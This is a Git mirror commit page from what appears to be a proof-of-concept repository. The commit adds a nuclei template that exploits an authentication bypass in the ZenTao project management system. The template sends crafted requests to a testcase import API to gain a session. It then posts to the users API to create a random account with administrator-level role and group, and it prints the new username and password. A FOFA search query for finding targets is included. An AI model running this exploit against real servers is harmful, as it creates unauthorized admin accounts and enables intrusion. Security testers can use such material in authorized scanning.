admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update 禅道项目管理系统身份认证绕过漏洞.md

Browse Source
This commit is contained in:
wy876 2024-04-29 19:04:53 +08:00 committed by GitHub
parent 54a2b4026d
commit 65ccf3f49c
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 77 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

77
禅道项目管理系统身份认证绕过漏洞.md
View File

@ -57,3 +57,80 @@ Cookie: zentaosid=d95c19a900256b7dc3c3f1866b1d121c
![image](https://github.com/wy876/POC/assets/139549762/1c15070d-1563-4573-aff9-5da0da8c5848) ![image](https://github.com/wy876/POC/assets/139549762/1c15070d-1563-4573-aff9-5da0da8c5848)
## nuclei
```
id: easycorp-zentao-pms-idor-exp
info:
name: 禅道项目管理系统身份认证绕过漏洞
author: GuoRong_X
severity: critical
description: |
- 禅道系统某些API设计为通过特定的鉴权函数进行验证但在实际实现中这个鉴权函数在鉴权失败后并不中断请求而是仅返回一个错误标志这个返回值在后续没有被适当处理。此外该系统在处理某些API时未能有效检查用户身份允许未认证的用户执行某些操作从而绕过鉴权机制。
reference:
- https://mp.weixin.qq.com/s/hiGI_fQmXOHdkPqn6x00Jw
metadata:
verified: true
fofa-query: title="用户登录- 禅道"
tags: zentao
variables:
username: '{{rand_base(6)}}'
password: '{{rand_base(12)}}'
http:
- raw:
- |
GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
Host: {{Hostname}}
- |
GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
Host: {{Hostname}}
- |
GET /biz/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
Host: {{Hostname}}
- |
GET /max/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
Host: {{Hostname}}
- |
POST /api.php/v1/users HTTP/1.1
Host: {{Hostname}}
{"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
- |
POST /zentao/api.php/v1/users HTTP/1.1
Host: {{Hostname}}
{"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
- |
POST /biz/api.php/v1/users HTTP/1.1
Host: {{Hostname}}
{"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
- |
POST /max/api.php/v1/users HTTP/1.1
Host: {{Hostname}}
{"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_5, "{{username}}") || contains(body_6, "{{username}}") || contains(body_7, "{{username}}") || contains(body_8, "{{username}}")'
condition: and
extractors:
- type: dsl
dsl:
- '"USER: "+ username'
- '"PASS: "+ password'
```